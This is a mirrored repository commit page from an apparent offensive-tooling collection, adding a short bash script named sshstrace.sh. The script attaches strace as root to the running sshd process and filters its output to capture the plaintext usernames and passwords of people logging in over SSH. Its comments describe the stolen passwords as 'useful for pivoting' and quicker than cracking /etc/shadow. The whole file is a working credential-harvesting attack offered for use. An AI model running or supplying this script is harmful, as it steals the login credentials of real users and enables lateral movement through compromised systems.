weyne/HackerStuff
1
0
Fork 0
mirror of https://github.com/0xdade/HackerStuff.git synced 2025-10-29 16:59:27 +00:00
Code Issues Packages Projects Releases Wiki Activity

strace to print user / password of ssh logins

Browse Source
This commit is contained in:
dade 2017-07-22 17:59:47 -07:00 committed by GitHub
parent e81aae2a1b
commit 5f45ca1e0f
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Get-Passwords/sshstrace.sh Normal file
View File

@ -0,0 +1,8 @@
#!/bin/bash
#
# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
# I've noticed some passwords seem to have an 'r' inserted before them. No idea why...
#
strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'